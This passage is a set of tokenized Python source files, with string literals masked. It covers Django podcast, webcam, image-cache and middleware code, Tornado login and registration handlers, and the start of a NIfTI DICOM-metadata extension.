, { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:location>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . contrib import admin <EOL> from models import * <EOL> class PodcastCategoryNameInline ( admin . TabularInline ) : <EOL> model = PodcastCategoryName <EOL> fk_name = "<STR_LIT>" <EOL> class PodcastCategoryAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> inlines = [ <EOL> PodcastCategoryNameInline , <EOL> ] <EOL> class PodcastAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> class PodcastItemAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> admin . site . register ( Podcast , PodcastAdmin ) <EOL> admin . site . register ( PodcastCategory , PodcastCategoryAdmin ) <EOL> admin . site . register ( PodcastItem , PodcastItemAdmin ) <EOL> admin . site . register ( PodcastEnclosure ) </s>
<s> from molly . conf . provider import Provider <EOL> from datetime import datetime <EOL> import dateutil . parser <EOL> import feedparser <EOL> class RSSModuleServiceStatusProvider ( Provider ) : <EOL> def __init__ ( self , name , slug , url ) : <EOL> self . name , self . slug , self . url = name , slug , url <EOL> def parse_date ( self , s ) : <EOL> try : <EOL> return dateutil . parser . parse ( s ) <EOL> except ( TypeError , ValueError ) : <EOL> return None <EOL> def safe_parse ( self , f , s ) : <EOL> try : <EOL> return f ( s ) <EOL> except ( TypeError , ValueError ) : <EOL> return None <EOL> def get_status ( self ) : <EOL> services_feed = feedparser . parse ( self . url ) <EOL> try : <EOL> lastBuildDate = self . parse_date ( services_feed . entries [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) ) <EOL> except IndexError , e : <EOL> try : <EOL> lastBuildDate = self . parse_date ( services_feed . headers [ '<STR_LIT>' ] ) <EOL> except Exception , e : <EOL> lastBuildDate = None <EOL> services = [ ] <EOL> for service in services_feed . entries : <EOL> services . append ( { <EOL> '<STR_LIT:source>' : self . slug , <EOL> '<STR_LIT>' : self . name , <EOL> '<STR_LIT:name>' : service . title , <EOL> '<STR_LIT>' : { '<STR_LIT:true>' : True , '<STR_LIT:false>' : False } . get ( service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . parse_date ( service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . parse_date ( service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . safe_parse ( int , service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . safe_parse ( float , service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : service . get ( '<STR_LIT>' ) , <EOL> } ) <EOL> services [ - <NUM_LIT:1> ] [ '<STR_LIT:status>' ] = { <NUM_LIT:0> : '<STR_LIT>' , <NUM_LIT:100> : '<STR_LIT>' , None : { True : '<STR_LIT>' , False : '<STR_LIT>' , } . get ( services [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) } . get ( services [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT>' : services , <EOL> '<STR_LIT>' : lastBuildDate , <EOL> } <EOL> def get_announcements ( self ) : <EOL> return [ ] </s>
<s> from datetime import timedelta <EOL> from xml . sax . saxutils import escape <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . http import Http404 <EOL> from django . utils . translation import ugettext as _ <EOL> from molly . conf . urls import url <EOL> from molly . utils . breadcrumbs import * <EOL> from molly . utils . views import BaseView <EOL> from molly . favourites . views import FavouritableView <EOL> from molly . external_media import resize_external_image <EOL> from molly . apps . webcams . models import Webcam , WEBCAM_WIDTHS <EOL> import datetime <EOL> @ url ( r'<STR_LIT>' , '<STR_LIT:index>' ) <EOL> class IndexView ( BaseView ) : <EOL> def get_metadata ( self , request ) : <EOL> return { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> @ BreadcrumbFactory <EOL> def breadcrumb ( self , request , context ) : <EOL> return Breadcrumb ( self . conf . local_name , None , _ ( '<STR_LIT>' ) , lazy_reverse ( '<STR_LIT:index>' ) ) <EOL> def handle_GET ( self , request , context ) : <EOL> webcams = Webcam . objects . all ( ) <EOL> context [ '<STR_LIT>' ] = webcams <EOL> return self . render ( request , context , '<STR_LIT>' , <EOL> expires = timedelta ( days = <NUM_LIT:7> ) ) <EOL> @ url ( r'<STR_LIT>' , '<STR_LIT>' ) <EOL> class WebcamDetailView ( FavouritableView ) : <EOL> def get_metadata ( self , request , slug ) : <EOL> webcam = get_object_or_404 ( Webcam , slug = slug ) <EOL> return { <EOL> '<STR_LIT:title>' : webcam . title , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) % { '<STR_LIT:description>' : escape ( webcam . description ) } <EOL> } <EOL> def initial_context ( self , request , slug ) : <EOL> context = super ( WebcamDetailView , self ) . initial_context ( request ) <EOL> context . update ( { '<STR_LIT>' : get_object_or_404 ( Webcam , slug = slug ) } ) <EOL> return context <EOL> @ BreadcrumbFactory <EOL> def breadcrumb ( self , request , context , slug ) : <EOL> return Breadcrumb ( self . conf . local_name , lazy_parent ( '<STR_LIT:index>' ) , <EOL> _ ( '<STR_LIT>' ) , lazy_reverse ( '<STR_LIT>' , args = [ slug ] ) ) <EOL> def handle_GET ( self , request , context , slug ) : <EOL> try : <EOL> eis = resize_external_image ( <EOL> context [ '<STR_LIT>' ] . url , <EOL> request . map_width , timeout = <NUM_LIT:5> ) <EOL> except : <EOL> eis = None <EOL> context [ '<STR_LIT>' ] = eis <EOL> return self . render ( request , context , '<STR_LIT>' ) </s>
<s> from __future__ import division <EOL> import os . path <EOL> import random <EOL> import urllib <EOL> from datetime import datetime <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> from PIL import Image <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . core . urlresolvers import reverse <EOL> class ExternalImage ( models . Model ) : <EOL> url = models . URLField ( ) <EOL> etag = models . TextField ( null = True ) <EOL> last_modified = models . TextField ( null = True ) <EOL> last_updated = models . DateTimeField ( ) <EOL> width = models . PositiveIntegerField ( null = True ) <EOL> height = models . PositiveIntegerField ( null = True ) <EOL> def save ( self , force_insert = False , force_update = False , * args , ** kwargs ) : <EOL> self . last_updated = datetime . utcnow ( ) <EOL> super ( ExternalImage , self ) . save ( force_insert = False , force_update = False , ** kwargs ) <EOL> def get_external_image_dir ( ) : <EOL> return getattr ( settings , '<STR_LIT>' , os . path . join ( settings . CACHE_DIR , '<STR_LIT>' ) ) <EOL> class ExternalImageSized ( models . Model ) : <EOL> external_image = models . ForeignKey ( ExternalImage ) <EOL> width = models . PositiveIntegerField ( ) <EOL> height = models . PositiveIntegerField ( ) <EOL> slug = models . SlugField ( ) <EOL> content_type = models . TextField ( ) <EOL> def get_filename ( self ) : <EOL> external_image_dir = get_external_image_dir ( ) <EOL> if not self . slug : <EOL> while not self . slug or ExternalImageSized . objects . filter ( slug = self . slug ) . count ( ) : <EOL> self . slug = "<STR_LIT>" % random . randint ( <NUM_LIT:0> , <NUM_LIT:16> ** <NUM_LIT:8> - <NUM_LIT:1> ) <EOL> if not os . path . exists ( external_image_dir ) : <EOL> os . makedirs ( external_image_dir ) <EOL> return os . path . join ( external_image_dir , self . slug ) <EOL> def get_absolute_url ( self ) : <EOL> return reverse ( '<STR_LIT>' , args = [ self . slug ] ) <EOL> def save ( self , force_insert = False , force_update = False , * args , ** kwargs ) : <EOL> if not self . id : <EOL> response = urllib . urlopen ( self . external_image . url ) <EOL> data = StringIO ( response . read ( ) ) <EOL> im = Image . open ( data ) <EOL> size = im . size <EOL> ratio = size [ <NUM_LIT:1> ] / size [ <NUM_LIT:0> ] <EOL> if self . width >= size [ <NUM_LIT:0> ] : <EOL> resized = im <EOL> else : <EOL> try : <EOL> resized = im . resize ( ( self . width , int ( round ( self . width * ratio ) ) ) , Image . ANTIALIAS ) <EOL> except IOError , e : <EOL> if e . message == "<STR_LIT>" : <EOL> resized = im <EOL> else : <EOL> raise <EOL> self . width , self . height = resized . size <EOL> try : <EOL> resized . save ( self . get_filename ( ) , format = '<STR_LIT>' ) <EOL> self . content_type = '<STR_LIT>' <EOL> except IOError , e : <EOL> try : <EOL> resized . convert ( '<STR_LIT>' ) . save ( self . get_filename ( ) , format = '<STR_LIT>' ) <EOL> self . content_type = '<STR_LIT>' <EOL> except IOError : <EOL> open ( self . get_filename ( ) , '<STR_LIT:wb>' ) . write ( data . getvalue ( ) ) <EOL> self . content_type = response . headers [ '<STR_LIT>' ] <EOL> self . external_image . width = size [ <NUM_LIT:0> ] <EOL> self . external_image . height = size [ <NUM_LIT:1> ] <EOL> super ( ExternalImageSized , self ) . save ( force_insert = False , force_update = False , ** kwargs ) <EOL> def delete ( self ) : <EOL> try : <EOL> os . unlink ( self . get_filename ( ) ) <EOL> except OSError : <EOL> pass <EOL> super ( ExternalImageSized , self ) . delete ( ) </s>
<s> from django . conf . urls . defaults import * <EOL> from . views import GeneratedMapView , GPXView , AboutView <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , AboutView , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , GeneratedMapView , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , GPXView , { } , '<STR_LIT>' ) , <EOL> ) </s>
<s> import sys <EOL> import logging <EOL> from collections import namedtuple <EOL> from django . http import Http404 <EOL> from django . conf import settings <EOL> from django . contrib . gis . geos import Point <EOL> from django . core . exceptions import ImproperlyConfigured , PermissionDenied <EOL> from django . middleware . locale import LocaleMiddleware <EOL> from django . utils import translation <EOL> from django . core . signals import got_request_exception <EOL> from molly . utils . views import handler500 <EOL> logger = logging . getLogger ( __name__ ) <EOL> Location = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class LocationMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> latitude = None <EOL> longitude = None <EOL> accuracy = None <EOL> if '<STR_LIT>' in request . GET and '<STR_LIT>' in request . GET : <EOL> latitude = request . GET [ '<STR_LIT>' ] <EOL> longitude = request . GET [ '<STR_LIT>' ] <EOL> accuracy = request . GET . get ( '<STR_LIT>' ) <EOL> elif '<STR_LIT>' in request . META : <EOL> location_string = request . META [ '<STR_LIT>' ] <EOL> try : <EOL> temp_dict = dict ( [ token . split ( '<STR_LIT:=>' ) for token in location_string . split ( '<STR_LIT:U+002C>' ) ] ) <EOL> if '<STR_LIT>' in temp_dict and '<STR_LIT>' in temp_dict : <EOL> latitude = temp_dict [ '<STR_LIT>' ] <EOL> longitude = temp_dict [ '<STR_LIT>' ] <EOL> accuracy = temp_dict . get ( '<STR_LIT>' ) <EOL> except ValueError : <EOL> pass <EOL> elif '<STR_LIT>' in request . session : <EOL> longitude , latitude = request . session [ '<STR_LIT>' ] <EOL> accuracy = request . session . get ( '<STR_LIT>' ) <EOL> if latitude and longitude : <EOL> point = Point ( float ( longitude ) , float ( latitude ) , srid = <NUM_LIT> ) <EOL> if accuracy : <EOL> accuracy = float ( accuracy ) <EOL> else : <EOL> accuracy = None <EOL> request . user_location = Location ( point , accuracy ) <EOL> class ErrorHandlingMiddleware ( object ) : <EOL> def process_exception ( self , request , exception ) : <EOL> if isinstance ( exception , Http404 ) : <EOL> return <EOL> elif isinstance ( exception , PermissionDenied ) : <EOL> return <EOL> elif isinstance ( exception , ImproperlyConfigured ) : <EOL> logger . critical ( "<STR_LIT>" , exc_info = True ) <EOL> else : <EOL> logger . exception ( "<STR_LIT>" % ( type ( exception ) . __name__ , request . path ) ) <EOL> got_request_exception . send ( sender = self , request = request ) <EOL> return handler500 ( request , exc_info = sys . exc_info ( ) ) <EOL> class CookieLocaleMiddleware ( LocaleMiddleware ) : <EOL> def process_request ( self , request ) : <EOL> language_code = request . REQUEST . get ( '<STR_LIT>' ) <EOL> if language_code and language_code in dict ( settings . LANGUAGES ) : <EOL> translation . activate ( language_code ) <EOL> else : <EOL> if hasattr ( request , '<STR_LIT>' ) : <EOL> session = request . session <EOL> del request . session <EOL> super ( CookieLocaleMiddleware , self ) . process_request ( request ) <EOL> request . session = session <EOL> else : <EOL> super ( CookieLocaleMiddleware , self ) . process_request ( request ) <EOL> def process_response ( self , request , response ) : <EOL> language_code = request . REQUEST . get ( '<STR_LIT>' ) <EOL> if language_code and language_code in dict ( settings . LANGUAGES ) : <EOL> response . set_cookie ( settings . LANGUAGE_COOKIE_NAME , language_code ) <EOL> return super ( CookieLocaleMiddleware , self ) . process_response ( request , <EOL> response ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import logging <EOL> from tornado . web import RequestHandler <EOL> from recaptcha . client import captcha <EOL> from libs . Form import Form <EOL> from libs . ConfigManager import ConfigManager <EOL> from libs . SecurityDecorators import authenticated <EOL> from handlers . BaseHandlers import BaseHandler <EOL> from models import User <EOL> class WelcomeHandler ( BaseHandler ) : <EOL> '''<STR_LIT>''' <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" ) <EOL> class LoginHandler ( BaseHandler ) : <EOL> '''<STR_LIT>''' <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" , errors = None ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> form = Form ( <EOL> username = "<STR_LIT>" , <EOL> password = "<STR_LIT>" , <EOL> ) <EOL> if not form . validate ( self . request . arguments ) : <EOL> self . render ( "<STR_LIT>" , errors = form . errors ) <EOL> else : <EOL> user = User . by_username ( self . get_argument ( '<STR_LIT:username>' ) ) <EOL> if user is not None and user . validate_password ( self . get_argument ( '<STR_LIT:password>' ) ) : <EOL> if user . locked : <EOL> self . render ( "<STR_LIT>" , <EOL> errors = [ "<STR_LIT>" ] <EOL> ) <EOL> else : <EOL> self . successful_login ( user ) <EOL> self . redirect ( '<STR_LIT>' ) <EOL> else : <EOL> self . failed_login ( ) <EOL> def successful_login ( self , user ) : <EOL> '''<STR_LIT>''' <EOL> logging . info ( "<STR_LIT>" % ( <EOL> user . username , self . request . remote_ip , <EOL> ) ) <EOL> self . start_session ( ) <EOL> self . session [ '<STR_LIT:username>' ] = str ( user . username ) <EOL> self . session [ '<STR_LIT>' ] = str ( self . request . remote_ip ) <EOL> if user . has_permission ( '<STR_LIT>' ) : <EOL> self . session . data [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> else : <EOL> self . session . data [ '<STR_LIT>' ] = "<STR_LIT:user>" <EOL> self . session . save ( ) <EOL> def failed_login ( self ) : <EOL> '''<STR_LIT>''' <EOL> logging . info ( "<STR_LIT>" % self . request . remote_ip ) <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ "<STR_LIT>" ] <EOL> ) <EOL> class RegistrationHandler ( BaseHandler ) : <EOL> '''<STR_LIT>''' <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" , errors = None ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> form = Form ( <EOL> username = "<STR_LIT>" , <EOL> pass1 = "<STR_LIT>" , <EOL> pass2 = "<STR_LIT>" , <EOL> ) <EOL> if not form . validate ( self . request . arguments ) : <EOL> self . render ( "<STR_LIT>" , errors = form . errors ) <EOL> elif self . check_recaptcha ( ) : <EOL> username = self . get_argument ( '<STR_LIT:username>' ) <EOL> if User . by_username ( username ) is not None : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> elif not <NUM_LIT:3> <= len ( username ) <= <NUM_LIT:15> : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> elif not self . get_argument ( '<STR_LIT>' ) == self . get_argument ( '<STR_LIT>' ) : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> elif not ( <NUM_LIT:12> <= len ( self . get_argument ( '<STR_LIT>' ) ) <= <NUM_LIT:100> ) : <EOL> self . render ( '<STR_LIT>' , <EOL> errors = [ '<STR_LIT>' ] <EOL> ) <EOL> else : <EOL> user = self . create_user ( username , self . get_argument ( '<STR_LIT>' ) ) <EOL> self . render ( "<STR_LIT>" , <EOL> username = user . username <EOL> ) <EOL> else : <EOL> self . render ( "<STR_LIT>" , errors = [ '<STR_LIT>' ] ) <EOL> def create_user ( self , username , password ) : <EOL> user = User ( username = unicode ( username ) ) <EOL> self . dbsession . add ( user ) <EOL> self . dbsession . flush ( ) <EOL> user . password = password <EOL> self . dbsession . add ( user ) <EOL> self . dbsession . flush ( ) <EOL> return user <EOL> def check_recaptcha ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . config . recaptcha_enable : <EOL> response = None <EOL> try : <EOL> response = captcha . submit ( <EOL> self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . config . recaptcha_private_key , <EOL> self . request . remote_ip <EOL> ) <EOL> except : <EOL> logging . exception ( "<STR_LIT>" ) <EOL> if response is not None and response . is_valid : <EOL> return True <EOL> else : <EOL> return False <EOL> else : <EOL> return True <EOL> class AboutHandler ( BaseHandler ) : <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import json , warnings <EOL> from copy import deepcopy <EOL> import numpy as np <EOL> import nibabel as nb <EOL> from nibabel . nifti1 import Nifti1Extension <EOL> from nibabel . spatialimages import HeaderDataError <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' ) <EOL> from nibabel . nicom . dicomwrappers import wrapper_from_data <EOL> dcm_meta_ecode = <NUM_LIT:0> <EOL> _meta_version = <NUM_LIT> <EOL> _req_base_keys_map = { <NUM_LIT:0.5> : set ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ) , <EOL> <NUM_LIT> : set ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ) , <EOL> } <EOL> '''<STR_LIT>''' <EOL> def is_constant ( sequence , period = None ) : <EOL> '''<STR_LIT>''' <EOL> if period is None : <EOL> return all ( val == sequence [ <NUM_LIT:0> ] for val in sequence ) <EOL> else : <EOL> if period <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> seq_len = len ( sequence ) <EOL> if seq_len % period != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for period_idx in range ( seq_len / period ) : <EOL> start_idx = period_idx * period <EOL> end_idx = start_idx + period <EOL> if not all ( val == sequence [ start_idx ] <EOL> for val in sequence [ start_idx : end_idx ] ) : <EOL> return False <EOL> return True <EOL> def is_repeating ( sequence , period ) : <EOL> '''<STR_LIT>''' <EOL> seq_len = len ( sequence ) <EOL> if period <= <NUM_LIT:1> or period >= seq_len : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if seq_len % period != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for period_idx in range ( <NUM_LIT:1> , seq_len / period ) : <EOL> start_idx = period_idx * period <EOL> end_idx = start_idx + period <EOL> if sequence [ start_idx : end_idx ] != sequence [ : period ] : <EOL> return False <EOL> return True <EOL> class InvalidExtensionError ( Exception ) : <EOL> def __init__ ( self , msg ) : <EOL> '''<STR_LIT>''' <EOL> self . msg = msg <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . msg <EOL> class DcmMetaExtension ( Nifti1Extension ) : <EOL> '''<STR_LIT>''' <EOL> @ property <EOL> def reorient_transform ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . version < <NUM_LIT> : <EOL> return None <EOL> if self . _content [ '<STR_LIT>' ] is None : <EOL> return None <EOL> return np . array ( self . _content [ '<STR_LIT>' ] ) <EOL> @ reorient_transform . setter <EOL> def reorient_transform ( self , value ) : <EOL> if not value is None and value . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if value is None : <EOL> self . _content [ '<STR_LIT>' ] = None <EOL> else : <EOL> self . _content [ '<STR_LIT>' ] = value . tolist ( ) <EOL> @ property <EOL> def affine ( self ) : <EOL> '''<STR_LIT>''' <EOL> return np . array ( self . _content [ '<STR_LIT>' ] ) <EOL> @ affine . setter <EOL> def affine ( self , value ) : <EOL> if value . shape != ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . _content [ '<STR_LIT>' ] = value . tolist ( ) <EOL> @ property <EOL> def slice_dim ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _content [ '<STR_LIT>' ] <EOL> @ slice_dim . setter <EOL> def slice_dim ( self , value ) : <EOL> if not value is None and not ( <NUM_LIT:0> <= value < <NUM_LIT:3> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _content [ '<STR_LIT>' ] = value <EOL> @ property <EOL> def shape ( self ) : <EOL> '''<STR_LIT>''' <EOL> return tuple ( self . _content [ '<STR_LIT>' ] ) <EOL> @ shape . setter <EOL> def shape ( self , value ) : <EOL> if not ( <NUM_LIT:3> <= len ( value ) < <NUM_LIT:6> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _content [ '<STR_LIT>' ] [ : ] = value <EOL> @ property <EOL> def version ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _content [ '<STR_LIT>' ] <EOL> @ version . setter <EOL> def version ( self , value ) : <EOL> '''<STR_LIT>''' <EOL> self . _content [ '<STR_LIT>' ] = value <EOL> @ property <EOL> def slice_normal ( self ) : <EOL> '''<STR_LIT>''' <EOL> slice_dim = self . slice_dim <EOL> if slice_dim is None : <EOL> return None <EOL> return np . array ( self . affine [ slice_dim ] [ : <NUM_LIT:3> ] 